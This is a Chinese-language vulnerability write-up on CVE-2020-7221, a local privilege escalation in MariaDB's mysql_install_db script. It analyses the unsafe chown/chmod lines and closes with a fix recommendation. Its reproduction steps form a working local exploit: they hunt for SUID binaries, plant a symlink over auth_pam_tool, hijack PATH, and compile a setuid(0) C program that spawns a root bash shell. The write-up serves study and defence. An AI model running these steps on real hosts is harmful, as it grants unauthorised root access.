(CVE-2020-7221)Mariadb 提权漏洞
一、漏洞简介
MariaDB 10.4.7到10.4.11中的mysql_install_db允许将特权从mysql用户帐户升级到root用户,因为chown和chmod的执行不安全,如对auth_pam_tool_dir / auth_pam_tool的chmod 04755的symlink攻击所证明的那样。注意:这不会影响Oracle MySQL产品,该产品以不同的方式实现mysql_install_db。
二、漏洞影响
Mariadb 10.4.7到10.4.11
三、复现过程
docker环境搭建:
docker pull mariadb:10.4.8
docker run -it 2ef19234ff46 /bin/bash
漏洞分析
首先定位漏洞点。
find / -name "mysql_install_db"
在bash脚本上下文中,如果\$user被定义则能进入「配置不当」漏洞点。
chown $user "$pamtooldir/auth_pam_tool_dir"
chmod 0700 "$pamtooldir/auth_pam_tool_dir"
这里配置了auth_pam_tool_dir目录的归属权和所有权,权限归属于\$user。 (这里是可控点之一)
chown 0 "$pamtooldir/auth_pam_tool_dir/auth_pam_tool"
chmod 04755 "$pamtooldir/auth_pam_tool_dir/auth_pam_tool"
这里配置了auth_pam_tool文件为0(root)所有权,4755文件权限(4为suid权限)。想要进入这个漏洞点需要\$srcdir变量值长度为0才能触发。
关于suid属性:
SUID属性一般用在可执行文件上,当用户执行该文件时,会「临时拥有该执行文件的所有者权限」。一旦程序拥有SUID权限的话,运行该程序时会以最高权限运行。
回溯 \$srcdir 与 \$user
- \$user
在脚本传递args参数时可控制\$user变量。
- \$srcdir
也在初始化操作时可控制变量,初始化时为空。
那么想要进入这个漏洞点需要\$srcdir为空,\$user需要设置值。
结合上文描述使用此命令才能触发漏洞点:
./mysql_install_db --user=mysql
漏洞复现
寻找suid属性的程序
find /* -perm -u=s -type f 2>/dev/null
搜索到的suid属性程序「auth_pam_tool」替换成我们的恶意suid程序。
1. rm auth_pam_tool
2. ln -s /root/pwn auth_pam_tool
3. export PATH=.:$PATH
4. ln -s /bin/bash ps
编写一个具有suid权限的恶意程序:
#include <unistd.h>
#include <stdlib.h>
int main(void)
{
setuid(0);
setgid(0);
system("ps");
return 0;
}
切换回root,在root权限下运行mysql_install_db脚本(触发修改chmod命令)
再回到mysql用户权限下执行auth_pam_tool
提权成功。
可以看到这个漏洞是由于suid与目录权限设置不当,才导致被提权利用的风险。建议在修复中设置auth_pam_tool_dir目录权限为root所有:
root:mysql 0750 /usr/lib/mysql/plugin/auth_pam_tool_dir